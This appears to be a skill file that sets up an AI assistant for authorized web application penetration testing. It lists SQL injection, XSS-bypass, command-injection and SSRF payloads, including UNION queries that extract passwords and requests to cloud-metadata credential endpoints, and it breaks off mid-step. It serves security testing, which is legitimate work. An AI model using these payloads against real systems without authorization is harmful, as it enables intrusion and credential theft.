Web Application Security Testing

# Web Application Security Testing

## Purpose

Enable Claude to assist with comprehensive web application security assessments covering OWASP Top 10, injection testing, API security, authentication analysis, and client-side security. Claude analyzes application behavior, generates test payloads, reviews source code, and produces structured vulnerability reports.

> **Authorization Required**: All testing must be performed on authorized targets only. Confirm scope and written authorization before testing.

---

## Activation Triggers

This skill activates when the user asks about:
- OWASP Top 10 testing or assessment methodology
- SQL injection, XSS, SSRF, SSTI, command injection testing
- API security testing (REST, GraphQL, SOAP)
- Authentication bypass, session management flaws
- Web application firewall (WAF) bypasses for authorized testing
- CORS, CSP, or security header analysis
- OAuth/OIDC security review
- JWT analysis or manipulation
- Burp Suite or OWASP ZAP usage guidance
- Web vulnerability report writing

---

## Prerequisites

```bash
pip install requests beautifulsoup4 urllib3 lxml
```

**Recommended tools:**
- `Burp Suite Community/Pro` — Web proxy and scanner
- `OWASP ZAP` — Open-source web scanner
- `sqlmap` — Automated SQL injection (authorized use only)
- `Nikto` — Web server scanner
- `ffuf / feroxbuster` — Web fuzzer
- `jwt_tool` — JWT analysis and manipulation

---

## Core Capabilities

### 1. OWASP Top 10 Assessment

**When the user asks to assess for OWASP Top 10 vulnerabilities:**

| # | Vulnerability | Claude's Assessment Approach |
|---|--------------|------------------------------|
| A01 | Broken Access Control | Test IDOR, path traversal, forced browsing, privilege escalation |
| A02 | Cryptographic Failures | Audit TLS, check sensitive data exposure, weak algorithms |
| A03 | Injection | Test all inputs for SQLi, NoSQLi, OS command, LDAP, SSTI |
| A04 | Insecure Design | Review architecture for missing security controls |
| A05 | Security Misconfiguration | Check defaults, error disclosure, directory listing, debug mode |
| A06 | Vulnerable Components | Audit third-party libraries and framework versions |
| A07 | Auth & ID Failures | Test session management, brute force, MFA, credential storage |
| A08 | Software & Data Integrity | Check update mechanisms, deserialization, CI/CD security |
| A09 | Logging & Monitoring Failures | Verify logging coverage and alerting |
| A10 | SSRF | Test URL parameters, webhooks, import functionality |

### 2. Injection Testing

**When the user asks to test for injection vulnerabilities:**

**Input Discovery — Map all injection points:**
```
GET/POST parameters
URL path segments (/users/INJECT/profile)
HTTP headers (X-Forwarded-For, User-Agent, Referer, Cookie)
JSON body fields {"name": "INJECT"}
XML body fields <name>INJECT</name>
GraphQL variables {query: "{ user(name: \"INJECT\") }"}
File upload names and metadata
```

**SQL Injection Testing Methodology:**
```
Step 1: Detection — Test for error-based confirmation
  ' → SQL error = likely vulnerable
  ' OR '1'='1 → true condition
  ' OR '1'='2 → false condition
  ' AND SLEEP(5)-- - → time delay = blind SQLi

Step 2: Fingerprint the database
  ' AND 1=CONVERT(int,@@version)-- - → MSSQL version
  ' AND 1=1 UNION SELECT @@version-- - → MySQL
  ' AND 1=(SELECT 1 FROM dual)-- - → Oracle

Step 3: Extraction (authorized PoC only)
  ' UNION SELECT null,username,password,null FROM users-- -
```

**SQLi Payload Library:**
```sql
-- Basic detection
'
''
`
')
'))
' OR '1'='1'--
' OR 1=1--
" OR "1"="1
' OR 'x'='x

-- MySQL time-based blind
' AND SLEEP(5)-- -
' OR SLEEP(5)=0-- -

-- MSSQL time-based blind
'; WAITFOR DELAY '0:0:5'-- -

-- PostgreSQL time-based blind
'; SELECT pg_sleep(5)-- -

-- Error-based (MySQL)
' AND extractvalue(1,concat(0x7e,(SELECT version())))-- -
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT version()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -

-- UNION enumeration
' ORDER BY 1-- -  (increment until error to find column count)
' UNION SELECT null-- -
' UNION SELECT null,null-- -
' UNION SELECT null,null,null-- -
```

**XSS Testing Methodology:**
```
Step 1: Find reflection points
  Input: test123  →  Search in source for "test123"
  What HTML context is it in?
    • HTML content: <p>test123</p>
    • Attribute: <input value="test123">
    • JavaScript: var x = "test123";
    • URL: href="test123"

Step 2: Test basic payload for context
  HTML content:    <script>alert(1)</script>
  Attribute:       " onmouseover="alert(1)
  JavaScript:      ";alert(1);//
  URL:             javascript:alert(1)

Step 3: Bypass filters
  Case variation:  <ScRiPt>alert(1)</ScRiPt>
  No parentheses:  <img src=x onerror=alert`1`>
  No script tag:   <img src=x onerror=alert(document.domain)>
  SVG:             <svg onload=alert(1)>
  Template:        {{constructor.constructor('alert(1)')()}}
```

**Command Injection Testing:**
```bash
# Linux injection separators
; id
| id
& id
&& id
`id`
$(id)
%0aid

# Windows injection separators
& whoami
| whoami
; dir
%26 dir

# Blind detection via time delay
; sleep 5
| timeout 5
& ping -n 5 127.0.0.1

# Blind detection via DNS callback (use Burp Collaborator or interactsh)
; nslookup YOUR-CALLBACK-DOMAIN.com
```

**SSRF Testing Methodology:**
```
Step 1: Find URL input points
  - Import functionality (import from URL)
  - Webhooks (send notification to URL)
  - Document converters (URL to PDF)
  - Image loading from URL
  - API calls with URL parameters

Step 2: Test basic SSRF to internal resources
  http://127.0.0.1/
  http://localhost/
  http://192.168.1.1/           # Default gateway
  http://169.254.169.254/       # AWS metadata
  http://metadata.google.internal/  # GCP metadata
  http://[::1]/                 # IPv6 localhost

Step 3: Test cloud metadata services (AWS example)
  http://169.254.169.254/latest/meta-data/
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

Step 4: